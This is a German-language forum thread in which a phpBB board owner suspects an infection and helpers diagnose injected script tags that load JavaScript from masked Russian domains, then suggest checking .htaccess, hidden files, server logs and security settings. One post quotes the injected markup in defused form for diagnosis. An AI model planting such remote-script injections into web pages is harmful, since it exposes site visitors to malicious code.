Ist phpbb 3.02 virenverseucht????

[Iannis]

Du solltest den Link auch aus Deiner Signatur entfernen.

DANKE für den Hinweis, hab ich sofort gemacht....

[Dr.Death]

Der Virus nistet sich genau vor dem </body></head> HTML Tags ein und lädt schadhaften Code von einem russischen Server nach.

Der "entschärfte" Code sieht so aus:

Code: Alles auswählen

<script src=http://www.xxxxx.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.yyyyyy.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.yyyyyy.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script><script src=http://www.xxxxx.ru/script.js></script></body>
</html>

Hier kann nur Dein Hoster helfen.

[nickvergessen]

Ne Frage noch: könnte es sein, daß ein hacker eine Sicherheitslücke bei phpbb ausnutzt, kennt jemand eine?
Ich meine mich zu erinnern, eine "Bot"-Liste hesehen zu haben, da habe ich diverse gelöscht, soweit ich es verstanden hab, gibt man damit den Zugriff der definierten Bots frei, alle anderen müssen draußen bleiben?

Sollte eine Sicherheitslücke bekannt sein, wird sie hier drin stehen und hoffentlich nicht in der Öffentlichkeit rumposaunt:
http://www.phpbb.com/security/phpbb3/
Die Bots aus der Liste zu entfernen hat nur als Folge, dass sie danach als Gäste unterwegs sind und die Berechtigungen der Gäste haben und nicht mehr die der Gruppe Bots

Und: beim download/Entpacken gab es eine htaccess Datei, die aber nicht beim upload übertragen wurde - könnte das damit zu tun haben? Und warum wurde die nicht hochgeladen?

Blendet dein FTP-Programm vllt unsichtbare Dateien aus?

[dieweltist]

Falls die Freeware FilleZilla verwendet wird, ist die Voreinstellung, dass versteckte Dateien ausgeblendet werden. Deswegen nach dem Start dieses FTP-Programms als erstes die versteckten Dateien einblenden! >View - Show hidden files<

[Iannis]

Falls die Freeware FilleZilla verwendet wird, ist die Voreinstellung, dass versteckte Dateien ausgeblendet werden. Deswegen nach dem Start dieses FTP-Programms als erstes die versteckten Dateien einblenden! >View - Show hidden files<

ich verwende wsftp gekaufte Version

Danke für den Hinweis bzgl. des eingenisteten codes, ich habe den Provider informiert, werde da aber jetzt mal nachhaken, bislang nix gehört

Frage mich halt immer noch, wie das möglich ist - so, wie es sich darstellt, ist es der Server vom Provider, der da verseucht ist. aber ich bin halt unsicher, ob nicht vielleicht doch jemand was via phpbb-Forum eingeschleust hat...und vor allem, wie ich das zukünftig verhindern kann

[darkon]

Na dann denk mal scharf nach... wenn das wirklich im phpBB selbst wäre, dann hätten sich doch hier etliche Leute gemeldet, denen es genauso geht.
Es hat sich aber kein einziger gemeldet.

Wenn dir das noch nicht reicht, dann lade dir ein phpbb neu runter und installiere es auf einem anderen Server (irgendein FreeHosting-Paket oder so sollte sich dafür einrichten lassen) und lasse deinen Hinweisgeber dieses dann testen.

[larsneo]

- kommt der schadcode denn nun vom installierten phpbb (d.h. wurden dort dateien angepasst) oder direkt vom server?
- hast du die logfiles (apache und ftp) aus dem zeitraum des angriffs mal analysiert?
- wie schaut's mit der generellen sicherheit auf dem server aus (z.b. phpsecinfo gibt einen guten überblick)